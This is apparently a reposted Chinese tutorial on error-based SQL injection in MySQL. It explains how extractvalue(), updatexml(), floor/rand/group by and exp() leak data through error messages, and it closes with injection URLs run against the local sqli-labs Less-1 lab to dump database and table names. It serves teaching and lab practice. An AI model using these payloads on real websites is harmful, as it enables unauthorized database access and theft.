SQL報錯注入的示例分析

小編給大家分享一下SQL報錯注入的示例分析，相信大部分人都還不怎么了解，因此分享這篇文章給大家參考一下，希望大家閱讀完這篇文章后大有收獲，下面讓我們一起去了解一下吧！

SQL報錯注入概述

通過構造特定的SQL語句，讓攻擊者想要查詢的信息（如數據庫名、版本號、用戶名等）通過頁面面的錯誤提示回顯出來。

報錯注入的前提條件

• Web應用程序未關閉數據庫報錯函數，對于一些SQL語句的錯誤直接回顯在頁面上

• 后臺未對一些具有報錯功能的函數（如extractvalue、updatexml等）進行過濾

Xpath類型函數

extractvalue()

作用：對XML文檔進行查詢，相當于在HTML文件中用標簽查找元素。

語法: extractvalue( XML_document, XPath_string )

• 參數1：XML_document是String格式，為XML文檔對象的名稱

• 參數2：XPath_string(Xpath格式的字符串)，注入時可操作的地方

報錯原理：xml文檔中查找字符位置是用/xxx/xxx/xxx/...這種格式，如果寫入其他格式就會報錯，并且會返回寫入的非法格式內容，錯誤信息如：XPATH syntax error:'xxxxxxxx‘

updatexml()

作用：改變文檔中符合條件的節點的值。

語法: updatexml( XML_document, XPath_string, new_value )

• 參數1：XML_document是String格式，為XML文檔對象的名稱

• 參數2：XPath_string(Xpath格式的字符串)，注入時可操作的地方

• 參數3：new_value，String格式，替換查找到的符合條件的數據

報錯原理:同extractvalue()

其他函數

floor()、rand()、count()、group by聯用

作用

floor(x)：對參數x向下取整

rand()：生成一個0～1之間的隨機浮點數

count(*)：統計某個表下總共有多少條記錄

group by x: 按照 (by) 一定的規則（x）進行分組

報錯原理：group by與rand()使用時，如果臨時表中沒有該主鍵，則在插入前會再計算一次rand()，然后再由group by將計算出來的主鍵直接插入到臨時表格中，導致主鍵重復報錯

exp()（5.5.5<= MySQL數據庫版本號<=5.5.49）

作用：計算以e（自然常數）為底的冪值

語法: exp(x)

報錯原理：當參數x超過710時，exp()函數會報錯，錯誤信息如：DOUBLE value is of range:

MySQL數據庫報錯功能函數總匯

報錯注入實例

extractvalue()

依然用sqli/Less-1

直接用報錯函數進行暴庫操作

暴庫

http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',database())) --+

暴表

http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+

后面的步驟大致相同，不再演示

updatexml()

暴庫

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',database()),1) --+

暴表

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

以上是“SQL報錯注入的示例分析”這篇文章的所有內容，感謝各位的閱讀！相信大家都有了一定的了解，希望分享的內容對大家有所幫助，如果還想學習更多知識，歡迎關注億速云行業資訊頻道！